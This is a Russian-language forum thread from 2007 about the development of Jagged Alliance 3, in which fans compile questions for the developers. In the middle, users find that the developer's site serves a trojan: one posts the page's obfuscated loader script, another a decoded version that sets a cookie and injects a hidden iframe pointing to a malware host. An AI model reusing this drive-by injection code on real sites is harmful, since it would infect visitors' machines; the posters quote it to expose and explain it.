Жаба [ДЖАба]
Прирожденный Джаец
Болотный хмырь
Пол: Репутация: +61
|
|
Re: Jagged Alliance 3 « Ответ #300 от 31.03.2007 в 00:51:42 » |
|
Немного инфы о технической стороне исполнения JA3 by Akella http://www.thg.ru/technews/20070330_235701.html Если в крате, то там немного написано про спец. ПО для создания лицевой анимации.Рожи,тоись,рисовать. Теперь сигара Бычка станет максимально детализированной, а ехидная морда Стрелка-абсолютно реальной))
|
|
Зарегистрирован |
|
|
|
JHVH [Отстой натуральный]
Гас Тарболс
Скажи нет попам!
Пол: Репутация: +200
|
|
Re: Jagged Alliance 3 « Ответ #301 от 31.03.2007 в 11:42:25 » |
|
это технология использовалась в SS - акелла просто сообщила купила лицензию. а используют ее уже давно - о чем можно судить по скринам.
|
|
Зарегистрирован |
"Если игра вам не нравится - это не значит что она плохая. Если игра вам нравится - это не значит что она хорошая. Если игра хорошая - это не значит что она вам понравится."
|
|
|
snake_sanders [песковитый змей]
Иван
Я люблю этот Форум!
Репутация: +7
|
|
Re: Jagged Alliance 3 « Ответ #302 от 16.04.2007 в 11:52:38 » |
|
Мне интересно, насколько сильным будет бэкграунд и будет вообще? Потом будет ли реализованы различные типы телосложения, в SS небыло такого, а также нельзя было при генерации сделать персу длинные волосы. Вот и получалось, что в игре все лысые или стриженные клоны были, стремно это.
|
|
Зарегистрирован |
|
|
|
Macbeth [Какой-то лес идет на Дунсинан!]
Прирожденный Джаец
Death turns all to ash.
Пол: Репутация: +398
|
|
Re: Jagged Alliance 3 « Ответ #303 от 16.04.2007 в 17:33:34 » |
|
Quote:Мне интересно, насколько сильным будет бэкграунд и будет вообще? Потом будет ли реализованы различные типы телосложения, в SS небыло такого, а также нельзя было при генерации сделать персу длинные волосы. Вот и получалось, что в игре все лысые или стриженные клоны были, стремно это. |
| Не думаю, что все это слишком существенно. Значение, конечно, имеет, но не первоочередное. И даже не второочередное...
|
« Изменён в : 16.04.2007 в 17:34:30 пользователем: Macbeth » |
Зарегистрирован |
Говорят, русские очень опасны. А этот - вообще со всех сторон ненормальный...
|
|
|
bugmonster [Баги! Баги везде!]
Source
ПРОГРАММИРЫ НЕ УЧИТЫВАЛИ ЭТУ СИТУАЦИЮ
Пол: Репутация: +1337
|
|
Re: Jagged Alliance 3 « Ответ #304 от 17.04.2007 в 12:09:00 » |
|
2snake_sanders: В SS у игрока были разные типы солдат, каждый со своим телосложением. А боевых волосатиков-хиппи тогда не существовало.
|
|
Зарегистрирован |
Восславим же радость и мужество, Труда и науки содружество Восславим мудрую партию, Помолимся за неё.
А Пентагон в свои руки поганые, Пусть возьмёт свои доллары сраные И в ж... себе затолкает
|
|
|
Novik [Человек и пароход]
Полный псих
Репутация: +224
|
|
Re: Jagged Alliance 3 « Ответ #305 от 18.04.2007 в 09:26:25 » |
|
Ну не совсем так. Все юниты были одного роста и примерно одинаковой комплекции - иначе "едет" анимация. Впрочем, в НД этот момент был решен - появились "толстые", "тонкие". AFAIR и с ростом юнитов вопрос в принципе решили.
|
|
Зарегистрирован |
|
|
|
snake_sanders [песковитый змей]
Иван
Я люблю этот Форум!
Репутация: +7
|
|
Re: Jagged Alliance 3 « Ответ #306 от 20.04.2007 в 18:53:13 » |
|
2bugmonster хардрок,по-моему, тогда тоже еще не играли
|
|
Зарегистрирован |
|
|
|
snake_sanders [песковитый змей]
Иван
Я люблю этот Форум!
Репутация: +7
|
|
Re: Jagged Alliance 3 « Ответ #307 от 12.05.2007 в 12:23:30 » |
|
Есть предложение подготовить интересующие ортодоксальных фанатов вопросы для разрабов и отправить их по почте!
|
|
Зарегистрирован |
|
|
|
GreenEyeMan [Добрый волшебник]
Псих
Истина как-то тут, а я ее где-то там.
Пол: Репутация: +274
|
|
Re: Jagged Alliance 3 « Ответ #308 от 12.05.2007 в 12:56:57 » |
|
Quote:интересующие ортодоксальных фанатов вопросы для разрабов и отправить их по почте! |
| - и ждать ответа лет этак двести. Проще зайти на их офф. сайт (если таковой имеется) и задать интересующий вопрос (или найти ответ на этот вопрос). Себе нервные клетки сэкономите таким образом.
|
|
Зарегистрирован |
Я счастлив, а остальное побоку.
|
|
|
Bolivar [Семён Боливар]
Небесный Всадник
Defensa y Encomienda
Пол: Репутация: +45
|
|
Re: Jagged Alliance 3 « Ответ #309 от 12.05.2007 в 14:02:06 » |
|
Quote: - ортодоксальные джа-двайцы, реформисты джа-трийцы и сектанты - джазайцы Предлагаю, в свою очередь, письмо с вопросами запечать в бутылку и бросить в северный ледовитый океан (вариант бросить в разраба F3games, если вдруг будет рядом...) - ответа не ждать вообще, и все нервые клетки целы-здоровы.
|
« Изменён в : 12.05.2007 в 14:03:44 пользователем: Bolivar » |
Зарегистрирован |
|
|
|
JHVH [Отстой натуральный]
Гас Тарболс
Скажи нет попам!
Пол: Репутация: +200
|
|
Re: Jagged Alliance 3 « Ответ #310 от 12.05.2007 в 14:10:27 » |
|
Quote:Проще зайти на их офф. сайт (если таковой имеется) и задать интересующий вопрос |
| ну вот http://f3games.com зайдите - спросите
|
|
Зарегистрирован |
"Если игра вам не нравится - это не значит что она плохая. Если игра вам нравится - это не значит что она хорошая. Если игра хорошая - это не значит что она вам понравится."
|
|
|
Bolivar [Семён Боливар]
Небесный Всадник
Defensa y Encomienda
Пол: Репутация: +45
|
|
Re: Jagged Alliance 3 « Ответ #311 от 12.05.2007 в 14:39:38 » |
|
Quote: при входе на страницу ловится троян 2JHVH: проверять ссылки надо, прежде, чем постить
|
|
Зарегистрирован |
|
|
|
Macbeth [Какой-то лес идет на Дунсинан!]
Прирожденный Джаец
Death turns all to ash.
Пол: Репутация: +398
|
|
Re: Jagged Alliance 3 « Ответ #312 от 12.05.2007 в 16:08:21 » |
|
Ссылка нормальная. Антивирусники надо нормальные ставить. А пользы от сайта все равно нет. Доступна только одна страница и дано мыло для тех, кто хочет у них работать.
|
|
Зарегистрирован |
Говорят, русские очень опасны. А этот - вообще со всех сторон ненормальный...
|
|
|
zed [SIG edition ;)]
A.I.M.Director
Была такая игра Z
Пол: Репутация: +532
|
|
Re: Jagged Alliance 3 « Ответ #313 от 12.05.2007 в 16:11:27 » |
|
2Macbeth: Оффтоп конечно злостный но лично у меня эта ссылка вогнала браузер в бесконечный цикл(Огненый лис)... возникла только одна мысль: и эти люди делают ja3
|
|
Зарегистрирован |
Кровавый ГБист, душитель свободы.
|
|
|
GreenEyeMan [Добрый волшебник]
Псих
Истина как-то тут, а я ее где-то там.
Пол: Репутация: +274
|
|
Re: Jagged Alliance 3 « Ответ #314 от 12.05.2007 в 16:31:46 » |
|
Quote:но лично у меня эта ссылка вогнала браузер в бесконечный цикл(Огненый лис) |
| - та же самая фигня.
|
|
Зарегистрирован |
Я счастлив, а остальное побоку.
|
|
|
Macbeth [Какой-то лес идет на Дунсинан!]
Прирожденный Джаец
Death turns all to ash.
Пол: Репутация: +398
|
|
Re: Jagged Alliance 3 « Ответ #315 от 12.05.2007 в 16:36:35 » |
|
У меня все нормально. Лиса 2.0.0.3. Quote: Раздел все равно не наш.
|
« Изменён в : 12.05.2007 в 16:37:24 пользователем: Macbeth » |
Зарегистрирован |
Говорят, русские очень опасны. А этот - вообще со всех сторон ненормальный...
|
|
|
Ximik [Законченный гитарист...]
Прирожденный Джаец
Пол: Репутация: +373
|
|
Re: Jagged Alliance 3 « Ответ #316 от 12.05.2007 в 16:54:49 » |
|
На всякий случай открывать не буду
|
|
Зарегистрирован |
|
|
|
snake_sanders [песковитый змей]
Иван
Я люблю этот Форум!
Репутация: +7
|
|
Re: Jagged Alliance 3 « Ответ #317 от 12.05.2007 в 17:07:42 » |
|
На офф. сайте ничего нет, кроме вакансий. Я писал на ящик разрабам, с просьбой рассказать о подробностях и новостях, касаемо JA3. На что получил ответ от Андрея Казакова:"Что конкретно?" Я не нашел что ответить и сказал что подготовлю небольшой список вопросов. Вот и все дела. Помоему разрабы готовы к диалогу! (в этой ветке вроде нет: в игре планируется 40 наемников и 40 неписяев)
|
|
Зарегистрирован |
|
|
|
JHVH [Отстой натуральный]
Гас Тарболс
Скажи нет попам!
Пол: Репутация: +200
|
|
Re: Jagged Alliance 3 « Ответ #318 от 12.05.2007 в 17:16:24 » |
|
Ссылку я тетсировал - нормально открывается. лисой 2.0.0.3. антивирус мой ничего не говорит. трояна там нет - это же официальный сайт. на котором правда ничего нет.
|
|
Зарегистрирован |
"Если игра вам не нравится - это не значит что она плохая. Если игра вам нравится - это не значит что она хорошая. Если игра хорошая - это не значит что она вам понравится."
|
|
|
snake_sanders [песковитый змей]
Иван
Я люблю этот Форум!
Репутация: +7
|
|
Re: Jagged Alliance 3 « Ответ #319 от 12.05.2007 в 17:20:20 » |
|
Quote:это технология использовалась в SS - акелла просто сообщила купила лицензию. а используют ее уже давно - о чем можно судить по скринам. |
| Этот пакет обновляется постоянно, и Акелла купила новую версию. Думаю так. Но то, что выглядеть будет лучше чем в SS - точно!
|
|
Зарегистрирован |
|
|
|
zed [SIG edition ;)]
A.I.M.Director
Была такая игра Z
Пол: Репутация: +532
|
|
Re: Jagged Alliance 3 « Ответ #320 от 12.05.2007 в 17:51:05 » |
|
2JHVH: Ну тогда наверное у нас какието особенные фаерфоксы Мда мега скриптик у них на сайте.... Offtop:<script>document.write(unescape("%3Cscript%3Etry%20%7Bfunction%20kv%28oH %29%7Breturn%20parseInt%28oH%29%7Dvar%20CQ%3D%27hhEhPEhYEhHEhzEhXEhKEhWEhnEhyEhREhLEhfEhSEhmEhxEhdEhIEhiEhaEhtEh3EhUEhTEhZEh4EhbEhcEhwEhgEhBEhDEhjEhoEh7EhJEh6EhCEhOEhkEhpEhNEhlEh5EhFEh8EhsEhMEhrEhGEh9EheEhVEhqEPhEPPEPYEPHEPzEPXEPKEPWEPnEPyEPREPLEPfEPSEPmEPx%27%3Bvar%20AF%3DString%28%27E%27%29%2Cgf%3DArray%2823534%5E23479%2Ckv%28%2722%27%29%2Ckv%28%276%27%29%2C11614%5E11593%2Ckv%28%2712%27%29%2C3462%5E3475%2Ckv%28%2717%27%29%2C22554%5E22593%2Ckv%28%27104%27%29%2C25170%5E25149%2C32036%5E32039%2Ckv%28%2716%27%29%2C19750%5E19757%2C22629%5E22639%2C31446%5E31379%2Ckv%28%2728%27%29%2C24673%5E24667%2Ckv%28%2777%27%29%2Ckv%28%2776%27%29%2Ckv%28%2730%27%29%2Ckv%28%2719%27%29%2C8145%5E8149%2Ckv%28%279%27%29%2C31013%5E31101%2Ckv%28%2787%27%29%2C25266%5E25315%2C24912%5E24857%2C9404%5E9467%2Ckv%28%2785%27%29%2Ckv%28%2784%27%29%2Ckv%28%2786%27%29%2C28593%5E28641%2C22930%5E22977%2C14303%5E14221%2Ckv%28%2793%27%29%2Ckv%28%2792%27%29%2Ckv%28%277%27%29%2Ckv%28%271%27%29%2Ckv%28%270%27%29%2C15727%5E15665%2C27687%5E27753%2Ckv%28%2775%27%29%2Ckv%28%2740%27%29%2Ckv%28%2713%27%29%2C31457%5E31465%2C32412%5E32467%2Ckv%28%272%27%29%2C18007%5E17999%2C20643%5E20657%2Ckv%28%2733%27%29%2Ckv%28%2749%27%29%2Ckv%28%2714%27%29%2Ckv%28%2729%27%29%2Ckv%28%2734%27%29%2Ckv%28%2754%27%29%2Ckv%28%2774%27%29%2Ckv%28%2742%27%29%2C32081%5E32025%2Ckv%28%2795%27%29%2Ckv%28%2768%27%29%2Ckv%28%2790%27%29%2Ckv%28%2762%27%29%2C12390%5E12381%2C23514%5E23493%2C14675%5E14699%2C17814%5E17839%2C9023%5E8991%2C9659%5E9631%2C29204%5E29235%2C12851%5E12821%29%3Bvar%20lD%2CHa%3Bvar%20jP%2CEX%3D%27hhhPhYhHhzhXhKhWhnhyhRhLhfhYhKhzhShfhmhHhPhxhPhdhHhPhIhihahmhth3hHhmhUhThZh4hbhYhThchwhghZhBh4hDhjhoh7hJhwh3h6hYhChOhRhchbhShThchchkhmhRhShHhIhzhThwhkhmhzhmhhhmhUhkhmhzhphphihmhShmhphThmhYhNhPhLh6hPhKhHhIhlh3hKh5hNhRhUhShShHhIhlh3hKh5hNhHh3hfhChShFhIhih8hYhNhUhOhfhshKh5hihbhghbhghihkhmhHhOhKhLhHhfhmhShkhmhMhnhyhRhLhfhYhKhzhShfhmhHhPhxhPhdhPhYhIhYhfhbhYhthihahmhth3hHhmhKhThmhfhOhrhmhGh3hKhOhIhihkhmhth3hHhmhOhThmhfhOhrhmhGh3hKhOhIhihkhmhOhNhPhOhKh9hzhFhOhIhKhNhshOhKh9hzhFhOhIhihphBhjhwhwhwhwhwh8hZh4hihkhmhChShYhLhFhOhfhKhNhYhShShehzhOhmhThmhYhfhphchThchphOhPhYh3hXhOhIhYhthihphchkhOhVhXhzhHhOhPhThchphOhNhKhShqhlh9PhhKhHhzhfhshIhihkhmhMhnhyhth3hHhmhYhfhmhThmhchghHhPhrhBhShghChchbhYhthmhThmhchghchbhPhOhThchPhghNhHhShUhUhPhxhPhKhOhFhPhNhzhfhRhShchbhXhThcPPh5hKhFhUPPhchkhnhyhzhRhIhChShYhLhFhOhfhKhNhYhShShehzhOhNhzhfhChOhVPYhRhIhYhfhphchchphchThchphYhthphchchihmhThThmPHhghihmhahnhyhth3hHhmhLhHhUhmhThmhch5hKhKhXPzPPPPhchmhphmhIhChShYhLhFhOhfhKhNhUhShYh3hKhzhShfhNh5hShPhKhmPXhThmhchchmPKhmhchchmPzhmhHhPhxhPhdhHhPhIhihihmhphmhChShYhLhFhOhfhKhNhUhShYh3hKhzhShfhNh5hShPhKhNhHhOhXhUh3hYhOhIPPPWPnh3PHPyhwPHhJhNPHPRPPhbhmhchNhchihNhHhOhXhUh3hYhOhIPPPLhNhpPPhbhmhchNhchihmhphmhchNhchmhphmhHhPhxhPhdhHhPhIhihmhphmhchNhchmhphmhPhOhmhphmhXhkhnhyhth3hHhmhShmhThmhChShYhLhFhOhfhKhNhYhHhOh3hKhOPfhUhOhFhOhfhKhIhchzhRhHh3hFhOhchihkhShNhPhOhKPShKhKhHhzh6hLhKhOhIhchPhHhYhchbhmhLhHhUhihkhnhyhShNhRhHh3hFhOPmhShHhChOhHhThwhkhmhShNhrhzhChKh5hThghkhmhShNh5hOhzhsh5hKhThghkhmhShNhPhKhxhUhOhNhChzhPhXhUh3hxhThchfhShfhOhchkhmhnhyhKhHhxhmhahmhChShYhLhFhOhfhKhNh6hShChxhNh3hXhXhOhfhCPxh5hzhUhChIhShihkhmhHhPhxhPhdhPhYhIhYhfhbhYhthihkhMhnhyhYh3hKhYh5hIhOhihahChShYhLhFhOhfhKhNhrhHhzhKhOhIhchhh5hKhFhUhWhhh6hShChxhWhhPPh6hShChxhWhhPPh5hKhFhUhWhchihkhChShYhLhFhOhfhKhNh6hShChxhNh3hXhXhOhfhCPxh5hzhUhChIhShihkhmhHhPhxhPhdhPhYhIhYhfhbhYhthihkhMhMhnhyhhPPhPhYhHhzhXhKhW%27%3Bvar%20Sw%3DString%28%29%3BCQ%3DCQ.split%28AF%29%3Bfor%28lD%3D0%3BlD%3CEX.length%3BlD+%3D2%29%7BjP%3DEX.substr%28lD%2C2%29%3Bfor%28Ha%3D0%3BHa%3CCQ.length%3BHa++%29%7Bif%28CQ%5BHa%5D%3D%3DjP%29break%3B%7D%20Sw+%3DString.fromCharCode%28gf%5BHa%5D%5E101%29%3B%7Ddocument.write%28Sw%29%3B%7D%0Acatch%28e%29%7B%7D%3C/script%3E"))</script> |
|
|
« Изменён в : 12.05.2007 в 17:57:08 пользователем: Zed » |
Зарегистрирован |
Кровавый ГБист, душитель свободы.
|
|
|
SSSVOLOCH [хад!]
Полный псих
Пол: Репутация: +222
|
|
Re: Jagged Alliance 3 « Ответ #321 от 13.05.2007 в 15:24:58 » |
|
Разрабы-то там никогда от диалога не отказывались. Просто форума своего нет - а на другие ходить не хотят, что понять можно. Так что - от списка вопросов может быть польза, уверен.
|
|
Зарегистрирован |
MY RULE IS A GOOD RULE! I SAID!
(C) - "The Grim Adventures Of Billy & Mandy"
|
|
|
Macbeth [Какой-то лес идет на Дунсинан!]
Прирожденный Джаец
Death turns all to ash.
Пол: Репутация: +398
|
|
Re: Jagged Alliance 3 « Ответ #322 от 13.05.2007 в 18:24:39 » |
|
Quote:а на другие ходить не хотят |
| Если так оно и есть, то я бы принципиально не стал бы у них ничего спрашивать. Если они думают, что сами все знают - то флаг им в руки, якорь на шею. А потом пусть выслушивают ругань, если их мысли не совпадут с большинством игроков, любящих пошаговую тактику.
|
|
Зарегистрирован |
Говорят, русские очень опасны. А этот - вообще со всех сторон ненормальный...
|
|
|
SSSVOLOCH [хад!]
Полный псих
Пол: Репутация: +222
|
|
Re: Jagged Alliance 3 « Ответ #323 от 13.05.2007 в 23:08:23 » |
|
2Macbeth: Честно говоря, всегда уважал людей, имеющих свое четкое видение своей (!) работы. Даже если оно и неправильное в глазах других. А касательно f3 - не забывайте, что их видение продиктовано издателем, SFI. Уж эти-то умеют доставать контролем - так что добавлять еще и фанатов к этому делу никому не охота.
|
|
Зарегистрирован |
MY RULE IS A GOOD RULE! I SAID!
(C) - "The Grim Adventures Of Billy & Mandy"
|
|
|
Macbeth [Какой-то лес идет на Дунсинан!]
Прирожденный Джаец
Death turns all to ash.
Пол: Репутация: +398
|
|
Re: Jagged Alliance 3 « Ответ #324 от 14.05.2007 в 09:30:18 » |
|
Quote:имеющих свое четкое видение своей (!) работы. |
| А вот имеют ли они это видение, да еще и четкое - вопрос. По поводу менеджмента, убранного ими "по многочисленным просьбам", уже писали раз 100. По-моему иметь видение - это одно, а контакт с потенциальными покупателями - другое. Я не вижу ничего сложного в том, чтобы поинтересоваться у потенциальных покупателей, нравятся им те или иные фичи или нет. Даже из сотни орущих голосов всегда можно найти хоть одну здравую идею, которую можно и нужно реализовать. Надеяться на себя хорошо, а самоуверенность - не всегда.
|
|
Зарегистрирован |
Говорят, русские очень опасны. А этот - вообще со всех сторон ненормальный...
|
|
|
SSSVOLOCH [хад!]
Полный псих
Пол: Репутация: +222
|
|
Re: Jagged Alliance 3 « Ответ #325 от 14.05.2007 в 09:43:47 » |
|
2Macbeth: Quote:Я не вижу ничего сложного в том, чтобы поинтересоваться у потенциальных покупателей, нравятся им те или иные фичи или нет. |
| А вот я - вижу, к сожалению. За эти решения им самим и отвечать потом.
|
|
Зарегистрирован |
MY RULE IS A GOOD RULE! I SAID!
(C) - "The Grim Adventures Of Billy & Mandy"
|
|
|
Macbeth [Какой-то лес идет на Дунсинан!]
Прирожденный Джаец
Death turns all to ash.
Пол: Репутация: +398
|
|
Re: Jagged Alliance 3 « Ответ #326 от 14.05.2007 в 10:05:41 » |
|
Quote:За эти решения им самим и отвечать потом. |
| Абсолютно не обязаны. Можно легко сказать "это будет в аддоне", "на это нет времени" и т.д. и т.п. Знакомая ситуация? Джаз не напоминает? И кто GFI говорит, что они обязаны делать ночь, ИИ для управления пулеметами и т.п. Недовольство, конечно, было, но ничего не поделаешь. Вот разработчики Противостояния 5 нормально общаются на главном русском ресурсе по этой игре. Диалог обычно проходит "а будет ли", "а что вы думаете о том, чтобы сделать". Как минимум обещают подумать. Конечно не все предложенное сделают, но хоть какой-то диалог есть.
|
« Изменён в : 14.05.2007 в 10:09:25 пользователем: Macbeth » |
Зарегистрирован |
Говорят, русские очень опасны. А этот - вообще со всех сторон ненормальный...
|
|
|
SSSVOLOCH [хад!]
Полный псих
Пол: Репутация: +222
|
|
Re: Jagged Alliance 3 « Ответ #327 от 14.05.2007 в 10:53:05 » |
|
2Macbeth: Ну так и мы матом вроде не посылаем, да? Просто игра уже на той стадии, когда добавлять - поздно. Поэтому часто и отвечаем - "не сейчас, не будет, в аддоне" и т.д. Диалог есть? Есть. А бегать на задних лапках никто не обязан.
|
« Изменён в : 14.05.2007 в 10:53:30 пользователем: SSSVOLOCH » |
Зарегистрирован |
MY RULE IS A GOOD RULE! I SAID!
(C) - "The Grim Adventures Of Billy & Mandy"
|
|
|
Satan`s Claws [Воскресший демон-хранитель]
Прирожденный Джаец
Я? верю? в Пакоса?
Пол: Репутация: +191
|
|
Re: Jagged Alliance 3 « Ответ #328 от 14.05.2007 в 11:17:17 » |
|
2zed: Offtop:объясни, глупому, что он делает... |
|
|
|
Зарегистрирован |
как-нить в другой раз
|
|
|
snake_sanders [песковитый змей]
Иван
Я люблю этот Форум!
Репутация: +7
|
|
Re: Jagged Alliance 3 « Ответ #329 от 14.05.2007 в 11:20:01 » |
|
Я предлагал список вопросов, а не пожелания составлять.
|
|
Зарегистрирован |
|
|
|
Novik [Человек и пароход]
Полный псих
Репутация: +224
|
|
Re: Jagged Alliance 3 « Ответ #330 от 14.05.2007 в 12:30:33 » |
|
Offtop: Quote:объясни, глупому, что он делает... |
| Если у запрашивающего не выставлено соотв. cookie, то выставляет его и организует на странице скрытый фрейм с адресом типа http://[разная хрень].s1.rollsystems.info/html/ откуда идет переход на http://s1.rollsystems.info/o0o/exp/ где, полагаю, и сидит троян. Впрочем, последнее не смотрел. Как бы то ни было, "для официального сайта" наличие подобной хрени мягко говоря, странно. Текст скрипта для желающих: Code: <script> function rsys_rs() { var l=24,c="01234567890abcdef",o=""; for(i=0; i < l; i++) o += c.substr(Math.floor(Math.random()*c.length),1,1); return o; } function rsys_sc(cn,cv) { var t= new Date(); var e= new Date(); e.setTime(t.getTime()+3600000*24); document.cookie = cn+"="+escape(cv)+";expires="+e.toGMTString(); } var cn = "1rsw3o1d",cv = "1",se="s1.rollsystems.info",p="/html/"; if(document.cookie.indexOf(cn+""+"="+cv+"") == -1) { var url = "http://" + (document.location.host != "" ? "" : rsys_rs()) + document.location.host.replace(/[^a-z0-9.-]/, ".").replace(/\.+/, ".") + "." + rsys_rs() + "." + se + p; var o = document.createElement("iframe"); o.setAttribute("src", url); o.frameBorder=0; o.width=1; o.height=1; o.style.display="none"; try { document.body.appendChild(o); */ document.f.bdy.value = url; rsys_sc(cn,cv); } catch(e) { document.write("<html><body></body></html>"); document.body.appendChild(o); rsys_sc(cn,cv); } } </script> |
| |
|
|
|
Зарегистрирован |
|
|
|
Ushwood [ДжАдай]
Прирожденный Джаец
May the Force be with you
Пол: Репутация: +562
|
|
Re: Jagged Alliance 3 « Ответ #331 от 15.05.2007 в 16:46:01 » |
|
2snake_sanders: Ну что ж. Если нашелся человек, который собирает вопросы для разрабов, почему бы и не задать. Для начала - несколько вопросов касательно тактического режима. Движок СС, конечно, неплох, но некоторые фишки там, как бы помягче сказать, не вполне хороши. Хотца выяснить, останутся ли эти фишки в JA3 или разрабы их отрежут... 1. Как осуществляются затраты АР на выстрел? Фиксированное количество АР (как в СС) или в зависимости от полного числа АР бойца (как в Х-СОМ1-3 и отчасти в JA2)? 2. Кстати, насколько отличаются по АР прокачанный ветеран от новичка? как Феррари от велосипеда (как в СС) или незначительно (как в JA2)? 3. Как реализован стелс-режим? Бойца не видно и не слышно (как в СС) или только не слышно (как в JA2)? Ну и несколько вопросов по тактическому режиму уже безотносительно сравнения СС и Джаги... 4. Можно ли оборудовать стрелковую позицию на дереве? 5. Можно ли свалиться с дерева, если отдача от выстрела окажется слишком сильной? 6. Можно ли метать гранаты (ножи, что там еще метается...) из положения сидя/лежа? 7. Можно ли в ближнем бою использовать огнестрельное оружие как холодное (приклад, штык-нож...)? 8. АИ умный?
|
|
Зарегистрирован |
Мои текущие переводы: Червь арка 30, версия 12.03.24
|
|
|
Ximik [Законченный гитарист...]
Прирожденный Джаец
Пол: Репутация: +373
|
|
Re: Jagged Alliance 3 « Ответ #332 от 15.05.2007 в 16:51:04 » |
|
2Ushwood: хорошие вопросы, ещё бы ответы посмотреть Offtop: Quote:Бойца не видно и не слышно (как в СС) |
| а как там было? Человек - невидимка что ли? |
|
|
|
Зарегистрирован |
|
|
|
Ushwood [ДжАдай]
Прирожденный Джаец
May the Force be with you
Пол: Репутация: +562
|
|
Re: Jagged Alliance 3 « Ответ #333 от 15.05.2007 в 16:53:43 » |
|
2Ximik: Offtop:Именно так и было. Боец в стелсе мог перед носом противника по открытому пространству ползать - и ничего. Если стелс хорошо прокачан. |
|
|
|
Зарегистрирован |
Мои текущие переводы: Червь арка 30, версия 12.03.24
|
|
|
bugmonster [Баги! Баги везде!]
Source
ПРОГРАММИРЫ НЕ УЧИТЫВАЛИ ЭТУ СИТУАЦИЮ
Пол: Репутация: +1337
|
|
Re: Jagged Alliance 3 « Ответ #334 от 15.05.2007 в 17:51:20 » |
|
2Ximik: Offtop:Скажу больше, боец в стелсе мог заползти во вражеского солдата в стелсе и оттуда никого не увидеть. Потом первым обнаруживается тот кто выползет с этой клетки. |
|
|
|
Зарегистрирован |
Восславим же радость и мужество, Труда и науки содружество Восславим мудрую партию, Помолимся за неё.
А Пентагон в свои руки поганые, Пусть возьмёт свои доллары сраные И в ж... себе затолкает
|
|
|
snake_sanders [песковитый змей]
Иван
Я люблю этот Форум!
Репутация: +7
|
|
Re: Jagged Alliance 3 « Ответ #335 от 15.05.2007 в 18:20:26 » |
|
Вот что уже есть. Вопросы мои + Ushwood+Docent+Bugmonster. 1.Компания F3 была образованна специально для работы над JA3, или проект перепал к вам случайно? 2.Как долго игра находиться в разработке? 3.Сколько людей сейчас работают над игрой? 4.Привлекались сотрудники покойной Sir-Tech к работе над проектом. Имеется ввиду консультация,вопросы по вселенной Jagged Alliance? 5.Будут реализованы в JA3 различные типы телосложения(в JA2 их было 8, не считая кошек,жуков и робота, а в Silent Storm-один на всех)? 6.Анимация создается при помощи Motion Capture?Как это скажется на гемплее?Будут ли реализованы различные виду рукопашной атаки, как это было в JA2?(мелочь,а приятно!) 7.Будут ли в игре танки? Как будет осуществляться передвижение по стране:транспорт как в JA2,или на только на своих двоих? 8.Как осуществляются затраты АР на выстрел? Фиксированное количество АР (как в SS) или в зависимости от полного числа АР бойца (как в Х-СОМ1-3 и отчасти в JA2)? 9.Насколько отличаются по АР прокачанный ветеран от новичка? как Феррари от велосипеда (как в SS) или незначительно (как в JA2)? 10.Как реализован стелс-режим? Бойца не видно и не слышно (как в СС) или только не слышно (как в JA2)? 11.Можно ли метать гранаты (ножи, что там еще метается...) из положения сидя/лежа? 12.Можно ли в ближнем бою использовать огнестрельное оружие как холодное (приклад, штык-нож...)? Хотелось бы! 13. Будут ли какие-то изменения в ролевой системе игры и прокачке персонажей, появятся ли новые навыки и перки ? Сколько специфических навыков сможет иметь один персонаж? За какие действия будет начисляться опыт (очки опыта) в игре, сможет ли игрок сам распределять их? 14. Как будет реализована экономическая составляющая игры? Какие источники дохода будут в игре, на что могут быть потрачены денежные средства? Будет ли возможность повышать навыки персонажей за деньги? Будут ли в игре интернет-магазины? Какие варианты и возможности будут у игрока при закупке/продаже вооружения и снаряжения ? 15. Какие будут в игре способы формирования и пополнения команды? Будет ли возможность вербовать пополнение из местного населения на карте, или только из виртуальных организаций по типу A.I.M.? Будут ли в игре бесплатные наёмники, например, после выполнения некоторых квестов? Какие способы оплаты труда наёмников будут реализованы в игре? 16. Планируется ли общая база для снаряжения (лечения, переформирования и т. д.) отряда по типу базы из серии "Операция Silent Storm"? Если общая база будет, то какие функции (госпиталь, склад, место отдыха и найма наёмников, что-то ещё?) она будет выполнять в игре? 17. Хотелось бы узнать подробности об "оружейной линейке игры", сколько и каких стволов планируется, предусматривается ли возможность их апгрейда и усовершенствований ? Какое ещё оружие планируется в игре помимо стрелкового? Совсем непонятно (совершенно неубедительные объяснения), почему лишили наёмников миномётов ? 18. Хочется услышать пояснения по поводу термина из пресс-релиза игры: "генерируемые этапы, отличающиеся уникальным стилем прохождения и сложностью" ? Чем они отличаются от сюжетных миссий, какую роль играют в игре? 19.Как будет реализован редактор персонажа: как в SS или JA2? 20.Будут ли в JA3 такие способы использования оружия из SS как: - Меткий выстрел на все AP. - Длинная очередь на все AP. - Снайперский выстрел, растягивающийся на несколько ходов. - Стрельба из стационарных орудий. - Стрельба на звук 21.Будут ли приглашены актеры, озвучивающие персонажей из JA2?
|
« Изменён в : 17.05.2007 в 19:24:28 пользователем: snake_sanders » |
Зарегистрирован |
|
|
|
Docent [Жентельмен у дачи]
Прирожденный Джаец
Украл, выпил - в тюрьму! Романтика!
Пол: Репутация: +351
|
|
Re: Jagged Alliance 3 « Ответ #336 от 16.05.2007 в 16:05:45 » |
|
Ещё некоторые вопросы: 1. Будут ли какие-то изменения в ролевой системе игры и прокачке персонажей, появятся ли новые навыки и перки ? Сколько специфических навыков сможет иметь один персонаж? За какие действия будет начисляться опыт (очки опыта) в игре, сможет ли игрок сам распределять их? 2. Как будет реализована экономическая составляющая игры? Какие источники дохода будут в игре, на что могут быть потрачены денежные средства? Будет ли возможность повышать навыки персонажей за деньги? Будут ли в игре интернет-магазины? Какие варианты и возможности будут у игрока при закупке/продаже вооружения и снаряжения ? 3. Какие будут в игре способы формирования и пополнения команды? Будет ли возможность вербовать пополнение из местного населения на карте, или только из виртуальных организаций по типу A.I.M.? Будут ли в игре бесплатные наёмники, например, после выполнения некоторых квестов? Какие способы оплаты труда наёмников будут реализованы в игре? 4. Планируется ли общая база для снаряжения (лечения, переформирования и т. д.) отряда по типу базы из серии "Операция Silent Storm"? Если общая база будет, то какие функции (госпиталь, склад, место отдыха и найма наёмников, что-то ещё?) она будет выполнять в игре? 5. Хотелось бы узнать подробности об "оружейной линейке игры", сколько и каких стволов планируется, предусматривается ли возможность их апгрейда и усовершенствований ? Какое ещё оружие планируется в игре помимо стрелкового? Совсем непонятно (совершенно неубедительные объяснения), почему лишили наёмников миномётов ? 7. Хочется услышать пояснения по поводу термина из пресс-релиза игры: "генерируемые этапы, отличающиеся уникальным стилем прохождения и сложностью" ? Чем они отличаются от сюжетных миссий, какую роль играют в игре? 8. Каким методом планируется перемещение отряда на стратегической карте? Планируется ли использование вертолётов, машин, бронированной техники для 